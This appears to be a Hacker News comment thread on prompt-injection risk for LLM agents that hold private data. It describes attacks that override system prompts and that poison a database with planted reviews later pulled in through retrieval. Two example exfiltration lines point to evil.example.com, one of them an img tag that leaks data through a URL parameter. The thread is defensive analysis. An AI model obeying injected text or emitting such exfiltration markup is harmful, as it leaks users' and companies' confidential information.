| ▲ | quuxplusone 3 hours ago | |||||||
Can you elaborate? How does an attacker turn "any of your users can even access the output of a chat or other generated text" into a means of exfiltrating data to the attacker? Are you just worried about social engineering — that is, if the attacker can make the LLM say "to complete registration, please paste the following hex code into evil.example.com:", then a large number of human users will just do that? I mean, you'd probably be right, but if that's "all" you mean, it'd be helpful to say so explicitly. | ||||||||
| ▲ | quuxplusone 2 hours ago | parent | next [-] | |||||||
Ah, perhaps answering myself: if the attacker can get the LLM to say "here, look at this HTML content in your browser: ... img src="https://evil.example.com/exfiltrate.jpg?data= ...", then a large number of human users will do that for sure. | ||||||||
| ▲ | btown 3 hours ago | parent | prev [-] | |||||||
So if an agent has no access to non-public data, that's (A) and (C) - the worst an attacker can do, as you note, is socially engineer themselves. But say you're building an agent that does have access to non-public data - say, a bot that can take your team's secret internal CRM notes about a client, or Top Secret Info about the Top Secret Suppliers relevant to their inquiry, or a proprietary basis for fraud detection, into account when crafting automatic responses. Or, if you even consider the details of your system prompt to be sensitive. Now, you have (A) (B) and (C). You might think that you can expressly forbid exfiltration of this sensitive information in your system prompt. But no current LLM is fully immune to prompt injection that overrides its system prompt from a determined attacker. And the attack doesn't even need to come from the user's current chat messages. If they're able to poison your database - say, by leaving a review or comment somewhere with the prompt injection, then saying something that's likely to bring that into the current context via RAG, that's also a way of injecting. This isn't to say that companies should avoid anything that has (A) (B) and (C) - tremendous value lies at this intersection! The devil's in the details: the degree of sensitivity of the information, the likelihood of highly tailored attacks, the economic and brand-integrity consequences of exfiltration, the tradeoffs against speed to market. But every team should have this conversation and have open eyes before deploying. | ||||||||
| ||||||||